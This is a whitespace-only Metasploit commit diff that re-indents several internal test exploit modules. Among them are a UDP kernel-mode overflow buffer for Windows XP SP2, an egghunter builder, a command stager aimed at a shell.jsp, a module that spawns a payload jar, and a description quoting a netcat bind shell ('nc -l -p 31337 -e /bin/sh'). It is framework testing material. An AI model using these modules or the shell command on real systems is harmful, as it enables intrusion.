Retab all the things (except external/)

Tab Assassin
2013-09-30 13:47:53 -05:00
parent 0ecba377f5
commit 2e8d19edcf
293 changed files with 32962 additions and 32962 deletions
+89 -89
@@ -12,106 +12,106 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Aggressive Test Exploit',
'Description' =>
"This module tests the exploitation of a test service.",
'Author' => 'skape',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => 'x86',
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
# Target 0: Universal
[
'Any Platform',
{
'Platform' => [ 'linux', 'win' ]
}
],
[
'Test encoder specific',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'EncoderOptions' =>
{
'BufferRegister' => 'EBX',
'BufferOffset' => 4
}
}
},
],
[
'Cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
],
[ 'Test context encoder',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'BadChars' => "\x00"
}
}
]
],
'DefaultTarget' => 0))
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Aggressive Test Exploit',
'Description' =>
"This module tests the exploitation of a test service.",
'Author' => 'skape',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => 'x86',
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
# Target 0: Universal
[
'Any Platform',
{
'Platform' => [ 'linux', 'win' ]
}
],
[
'Test encoder specific',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'EncoderOptions' =>
{
'BufferRegister' => 'EBX',
'BufferOffset' => 4
}
}
},
],
[
'Cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
],
[ 'Test context encoder',
{
'Platform' => [ 'linux', 'win' ],
'Payload' =>
{
'BadChars' => "\x00"
}
}
]
],
'DefaultTarget' => 0))
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
])
end
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
])
end
def autofilter
false
end
def autofilter
false
end
def check
return Exploit::CheckCode::Vulnerable
end
def check
return Exploit::CheckCode::Vulnerable
end
def exploit
# Show disassembled payload for context encoder test
if target.name =~ /context encoder/
puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
end
def exploit
# Show disassembled payload for context encoder test
if target.name =~ /context encoder/
puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
end
connect
connect
print_status("Sending #{payload.encoded.length} byte payload...[#{datastore['TestInteger']}]")
print_status("Sending #{payload.encoded.length} byte payload...[#{datastore['TestInteger']}]")
sock.put(payload.encoded)
sock.put(payload.encoded)
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
handler
end
handler
end
end
+29 -29
@@ -9,37 +9,37 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit
def initialize(info = {})
super(update_info(info,
'Name' => "Check Test Exploit",
'Description' => %q{
This module ensures that 'check' actually functions for Exploit modules.
},
'References' =>
[
[ 'OSVDB', '0' ]
],
'Author' =>
[
'todb'
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'May 23 2013'
))
def initialize(info = {})
super(update_info(info,
'Name' => "Check Test Exploit",
'Description' => %q{
This module ensures that 'check' actually functions for Exploit modules.
},
'References' =>
[
[ 'OSVDB', '0' ]
],
'Author' =>
[
'todb'
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'May 23 2013'
))
register_options(
[
Opt::RPORT(80)
], self.class)
end
register_options(
[
Opt::RPORT(80)
], self.class)
end
def check
print_debug "Check is successful"
return Msf::Exploit::CheckCode::Vulnerable
end
def check
print_debug "Check is successful"
return Msf::Exploit::CheckCode::Vulnerable
end
def exploit
print_debug "Exploit is successful."
end
def exploit
print_debug "Exploit is successful."
end
end
+59 -59
@@ -12,75 +12,75 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
# =( need more targets and perhaps more OS specific return values OS specific would be preferred
Rank = ManualRanking
# =( need more targets and perhaps more OS specific return values OS specific would be preferred
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerVBS
def initialize(info = {})
super(update_info(info,
'Name' => 'Command Stager Web Test',
'Description' => %q{
This module tests the command stager mixin against a shell.jsp application installed
on an Apache Tomcat server.
},
'Author' => 'bannedit',
'Version' => '$Revision$',
'References' =>
[
],
'DefaultOptions' =>
{
},
'Payload' =>
{
},
'Platform' => 'win',
'Privileged' => true,
'Targets' =>
[
# need more but this will likely cover most cases
[ 'Automatic Targeting',
{
'auto' => true
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 03 2010'))
def initialize(info = {})
super(update_info(info,
'Name' => 'Command Stager Web Test',
'Description' => %q{
This module tests the command stager mixin against a shell.jsp application installed
on an Apache Tomcat server.
},
'Author' => 'bannedit',
'Version' => '$Revision$',
'References' =>
[
],
'DefaultOptions' =>
{
},
'Payload' =>
{
},
'Platform' => 'win',
'Privileged' => true,
'Targets' =>
[
# need more but this will likely cover most cases
[ 'Automatic Targeting',
{
'auto' => true
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 03 2010'))
register_options(
[
Opt::RPORT(8080),
], self.class)
end
register_options(
[
Opt::RPORT(8080),
], self.class)
end
def autofilter
false
end
def autofilter
false
end
# This is method required for the CmdStager to work...
def execute_command(cmd, opts)
uri = opts[:uri]
http_hash = {
'uri' => uri.gsub(/CMDS/, Rex::Text.uri_encode(cmd))
}
resp = send_request_raw(http_hash, 5)
end
# This is method required for the CmdStager to work...
def execute_command(cmd, opts)
uri = opts[:uri]
http_hash = {
'uri' => uri.gsub(/CMDS/, Rex::Text.uri_encode(cmd))
}
resp = send_request_raw(http_hash, 5)
end
def exploit
def exploit
opts = {
:delay => 0.5,
:uri => "/shell/shell.jsp?cmd=CMDS"
}
opts = {
:delay => 0.5,
:uri => "/shell/shell.jsp?cmd=CMDS"
}
execute_cmdstager(opts)
execute_cmdstager(opts)
handler
handler
end
end
end
+37 -37
@@ -12,46 +12,46 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Dialup
include Msf::Exploit::Remote::Dialup
def initialize(info = {})
super(update_info(info,
'Name' => 'Test Dialup Exploit',
'Description' => %q{
This exploit connects to a system's modem over dialup and provides
the user with a readout of the login banner.
},
'Version' => '$Revision$',
'Author' =>
[
'I)ruid',
],
'Arch' => ARCH_TTY,
'Platform' => ['unix'],
'License' => MSF_LICENSE,
'Payload' =>
{
'Space' => 1000,
'BadChars' => '',
'DisableNops' => true,
},
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0))
end
def initialize(info = {})
super(update_info(info,
'Name' => 'Test Dialup Exploit',
'Description' => %q{
This exploit connects to a system's modem over dialup and provides
the user with a readout of the login banner.
},
'Version' => '$Revision$',
'Author' =>
[
'I)ruid',
],
'Arch' => ARCH_TTY,
'Platform' => ['unix'],
'License' => MSF_LICENSE,
'Payload' =>
{
'Space' => 1000,
'BadChars' => '',
'DisableNops' => true,
},
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0))
end
def autofilter
false
end
def autofilter
false
end
def exploit
connect_dialup
handler
disconnect_dialup
end
def exploit
connect_dialup
handler
disconnect_dialup
end
end
+66 -66
@@ -12,87 +12,87 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Egghunter
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Egghunter Test Exploit',
'Description' =>
"This module tests the exploitation of a test service using the Egghunter.",
'Author' => 'jduck',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => ARCH_X86,
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Egghunter Test Exploit',
'Description' =>
"This module tests the exploitation of a test service using the Egghunter.",
'Author' => 'jduck',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => ARCH_X86,
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'DefaultTarget' => 0))
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'DefaultTarget' => 0))
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ])
])
end
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ])
])
end
def autofilter
false
end
def autofilter
false
end
def check
return Exploit::CheckCode::Vulnerable
end
def check
return Exploit::CheckCode::Vulnerable
end
def exploit
def exploit
connect
connect
print_status("Sending #{payload.encoded.length} byte payload...")
print_status("Sending #{payload.encoded.length} byte payload...")
eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, {
:checksum => true
})
print_status("Egghunter: hunter stub #{eh_stub.length} bytes, egg #{eh_egg.length} bytes")
eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, {
:checksum => true
})
print_status("Egghunter: hunter stub #{eh_stub.length} bytes, egg #{eh_egg.length} bytes")
sploit = ''
sploit = ''
# break before?
#sploit << "\xcc"
sploit << eh_stub
# just return otherwise
sploit << "\xc3"
# hopefully we find this!
sploit << eh_egg
# break before?
#sploit << "\xcc"
sploit << eh_stub
# just return otherwise
sploit << "\xc3"
# hopefully we find this!
sploit << eh_egg
sock.put(sploit)
sock.put(sploit)
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
handler
end
handler
end
end
+104 -104
@@ -12,123 +12,123 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'MIPS Aggressive Test Exploit',
'Description' => 'This module tests the exploitation of a test service',
'Author' => ['skape', 'Julien Tinnes <julien[at]cr0.org>'],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
#'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'MaxNops' => 0,
#'BadChars' => "\x00",
#'StackAdjustment' => -3500,
},
'Targets' =>
[
# Target 0: Universal
[
'Mips big endian',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE
}
],
[
'Mips big endian cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
], [
'Mips big endian encoder needed',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'BadChars' => "\x00"
}
}
],
[
'Mips little endian',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE
}
],
[
'Mips little endian cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE,
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
], [
'Mips little endian encoder needed',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE,
'Payload' =>
{
'BadChars' => "\x00"
}
}
],
def initialize(info = {})
super(update_info(info,
'Name' => 'MIPS Aggressive Test Exploit',
'Description' => 'This module tests the exploitation of a test service',
'Author' => ['skape', 'Julien Tinnes <julien[at]cr0.org>'],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
#'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'MaxNops' => 0,
#'BadChars' => "\x00",
#'StackAdjustment' => -3500,
},
'Targets' =>
[
# Target 0: Universal
[
'Mips big endian',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE
}
],
[
'Mips big endian cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
], [
'Mips big endian encoder needed',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'BadChars' => "\x00"
}
}
],
[
'Mips little endian',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE
}
],
[
'Mips little endian cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE,
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
], [
'Mips little endian encoder needed',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE,
'Payload' =>
{
'BadChars' => "\x00"
}
}
],
],
'DefaultTarget' => 0))
],
'DefaultTarget' => 0))
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
])
end
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
])
end
def autofilter
false
end
def autofilter
false
end
def check
return Exploit::CheckCode::Vulnerable
end
def check
return Exploit::CheckCode::Vulnerable
end
def exploit
# Show disassembled payload for context encoder test
if target.name =~ /context encoder/
#puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
#FIXME: do this with metasm for MIPS (import new metasm version which fixes current bug!)
end
def exploit
# Show disassembled payload for context encoder test
if target.name =~ /context encoder/
#puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
#FIXME: do this with metasm for MIPS (import new metasm version which fixes current bug!)
end
connect
connect
print_status("Sending #{payload.encoded.length} byte payload...[#{datastore['TestInteger']}]")
print_status("Sending #{payload.encoded.length} byte payload...[#{datastore['TestInteger']}]")
sock.put(payload.encoded)
sock.put(payload.encoded)
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
handler
end
handler
end
end
+35 -35
@@ -13,46 +13,46 @@ require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
def initialize( info = {} )
super( update_info( info,
'Name' => 'Exec',
'Description' => %q{ },
'License' => MSF_LICENSE,
'Author' => [ 'egypt' ],
'Version' => '$Revision$',
'References' => [ ],
'Platform' => [ 'java', 'linux' ],
'Arch' => ARCH_JAVA,
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)', {
'Arch' => ARCH_JAVA,
'Platform' => 'java'
} ],
[ 'Linux', {
'Arch' => ARCH_X86,
'Platform' => 'linux'
} ],
],
'DefaultTarget' => 0
))
def initialize( info = {} )
super( update_info( info,
'Name' => 'Exec',
'Description' => %q{ },
'License' => MSF_LICENSE,
'Author' => [ 'egypt' ],
'Version' => '$Revision$',
'References' => [ ],
'Platform' => [ 'java', 'linux' ],
'Arch' => ARCH_JAVA,
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)', {
'Arch' => ARCH_JAVA,
'Platform' => 'java'
} ],
[ 'Linux', {
'Arch' => ARCH_X86,
'Platform' => 'linux'
} ],
],
'DefaultTarget' => 0
))
end
end
def exploit
# Equivalent to payload.encoded
@jar_data = payload.encoded_jar.pack
def exploit
# Equivalent to payload.encoded
@jar_data = payload.encoded_jar.pack
File.open("payload.jar", "wb") do |fd|
fd.write(@jar_data)
end
File.open("payload.jar", "wb") do |fd|
fd.write(@jar_data)
end
pid = Process.spawn("java -jar payload.jar &")
Process.detach pid
end
pid = Process.spawn("java -jar payload.jar &")
Process.detach pid
end
end
+59 -59
@@ -15,74 +15,74 @@ require 'msf/core'
# This is a test exploit for testing kernel-mode payloads.
#
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Udp
include Msf::Exploit::KernelMode
include Msf::Exploit::Remote::Udp
include Msf::Exploit::KernelMode
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Kernel-mode Test Exploit',
'Description' =>
"This module tests the exploitation of a kernel-mode test service.",
'Author' => 'skape',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => 'x86',
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'PrependEncoder' => "\x81\xC4\x0C\xFE\xFF\xFF" # add esp, -500
},
'Targets' =>
[
[
'Windows XP SP2',
{
'Ret' => 0x80502d7f, # jmp esp
'Platform' => 'win',
'Payload' =>
{
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'Recovery' => 'spin'
}
}
}
],
],
'DefaultTarget' => 0))
end
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Kernel-mode Test Exploit',
'Description' =>
"This module tests the exploitation of a kernel-mode test service.",
'Author' => 'skape',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => 'x86',
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'PrependEncoder' => "\x81\xC4\x0C\xFE\xFF\xFF" # add esp, -500
},
'Targets' =>
[
[
'Windows XP SP2',
{
'Ret' => 0x80502d7f, # jmp esp
'Platform' => 'win',
'Payload' =>
{
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'Recovery' => 'spin'
}
}
}
],
],
'DefaultTarget' => 0))
end
def autofilter
false
end
def autofilter
false
end
def check
return Exploit::CheckCode::Vulnerable
end
def check
return Exploit::CheckCode::Vulnerable
end
def exploit
connect_udp
def exploit
connect_udp
print_status("Sending #{payload.encoded.length} byte payload...")
print_status("Sending #{payload.encoded.length} byte payload...")
buf =
rand_text_alphanumeric(260) +
"\xbe\x7f\x00\x00" +
rand_text_alphanumeric(28) +
[target.ret].pack('V') +
rand_text_alphanumeric(8) +
payload.encoded
buf =
rand_text_alphanumeric(260) +
"\xbe\x7f\x00\x00" +
rand_text_alphanumeric(28) +
[target.ret].pack('V') +
rand_text_alphanumeric(8) +
payload.encoded
udp_sock.put(buf)
udp_sock.put(buf)
select(nil,nil,nil,2)
select(nil,nil,nil,2)
disconnect_udp
end
disconnect_udp
end
end
+37 -37
@@ -12,49 +12,49 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Command Test',
'Description' => %q{
This module tests cmd payloads by targeting (for example) a server
like: nc -l -p 31337 -e /bin/sh
},
'Author' => 'egypt',
'Version' => '$Revision$',
'References' => [ ],
'DefaultOptions' => { },
'Payload' =>
{
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' =>
[
[ 'Automatic Targeting', { } ],
],
'DefaultTarget' => 0
))
def initialize(info = {})
super(update_info(info,
'Name' => 'Command Test',
'Description' => %q{
This module tests cmd payloads by targeting (for example) a server
like: nc -l -p 31337 -e /bin/sh
},
'Author' => 'egypt',
'Version' => '$Revision$',
'References' => [ ],
'DefaultOptions' => { },
'Payload' =>
{
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' =>
[
[ 'Automatic Targeting', { } ],
],
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(31337),
], self.class)
end
register_options(
[
Opt::RPORT(31337),
], self.class)
end
def autofilter
false
end
def autofilter
false
end
def exploit
connect
def exploit
connect
sock.put(payload.encoded + "\n")
sock.put(payload.encoded + "\n")
handler
end
handler
end
end